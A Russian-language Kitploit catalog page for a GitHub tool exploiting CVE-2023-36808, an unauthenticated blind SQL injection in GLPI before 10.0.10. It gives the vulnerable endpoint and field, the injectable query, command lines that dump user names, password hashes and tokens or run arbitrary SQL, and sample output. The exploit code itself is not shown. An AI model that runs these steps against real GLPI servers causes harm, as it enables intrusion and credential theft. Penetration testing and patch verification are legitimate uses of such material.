Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
exploit-cve-2023-36808 — Эксплойт для слепой SQL-инъекции на основе времени для CVE-2023-36808 в GLPI < 10.0.10. Извлекает учётные данные пользователей и содержимое базы данных через неаутентифицированную XML-конечную точку инвентаризации с оптимизацией бинарного поиска. | Kitploit
Инструменты/GitHubGitHub/fransosiche/exploit-cve-2023-36808
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubfransosiche/exploit-cve-2023-36808

exploit-cve-2023-36808

Эксплойт для слепой SQL-инъекции на основе времени для CVE-2023-36808 в GLPI < 10.0.10. Извлекает учётные данные пользователей и содержимое базы данных через неаутентифицированную XML-конечную точку инвентаризации с оптимизацией бинарного поиска.

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-36808 - Неаутентифицированная SQL-инъекция в GLPI

Уязвимость

Версии GLPI < 10.0.10 предоставляют неаутентифицированную конечную точку XML-инвентаризации по адресу /front/inventory.php.
Поле <deviceid> вставляется непосредственно в SQL-запрос без санитизации:

root@kitploit:~
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'

Аутентификация не требуется. Уязвимость позволяет полное чтение базы данных посредством слепой SQL-инъекции.

Эксплойт

Этот скрипт использует временную слепую инъекцию с бинарным поиском для извлечения данных значительно быстрее, чем универсальные инструменты.

  • Один SLEEP на каждую логическую проверку (надёжно независимо от размера таблицы)
  • Бинарный поиск: ~7 запросов на символ вместо 95
  • Параллелизм на уровне полей: имя, пароль и токен извлекаются одновременно для каждого пользователя
  • Ограничение параллелизма предотвращает временные помехи между параллельными запросами

Требования

root@kitploit:~
pip install -r requirements.txt

Использование

root@kitploit:~
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi

# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"

# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3

# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4

Пример вывода

root@kitploit:~
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep  : 0.5s  Threshold: 0.35s  Parallel: 2

[+] Target reachable
[+] Injection confirmed

[*] User 1/7
  name               glpi
  password           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  personal_token     xxxx
...

Ссылки

  • NVD - CVE-2023-36808
  • Рекомендации по безопасности GLPI
Скачать инструмент